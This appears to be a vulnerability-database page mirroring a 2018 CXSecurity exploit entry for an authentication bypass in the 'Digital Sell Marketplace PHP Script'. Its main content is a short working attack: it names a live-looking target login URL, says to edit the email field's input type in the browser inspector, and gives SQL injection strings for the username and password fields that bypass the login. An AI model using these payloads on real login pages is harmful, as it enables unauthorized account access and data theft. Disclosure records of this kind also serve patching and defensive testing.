Digital Sell Marketplace PHP Script - Authentication Bypass - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1419594 漏洞类型
发布时间 2018-12-04 更新时间 2018-12-04
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018120032
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: Digital Sell Marketplace PHP Script - Authentication Bypass
# Date: 2018-12-04
# Exploit Author: Veyselxan
# Vendor Homepage:https://codecanyon.net/item/digital-sell-marketplace-php-script/21461481?s_rank=31
# Version: v1 (REQUIRED)
# Tested on: Linux
https://justchewi.000webhostapp.com/v11b/user/login.php

inspect change  email type 
<input id="email" type="email" class="form-control" name="email" value="" required="" autofocus="">
to 
<input id="email" type="text" class="form-control" name="email" value="" required="" autofocus="">
username: '=''or'@'=''or'

Password: '=''or'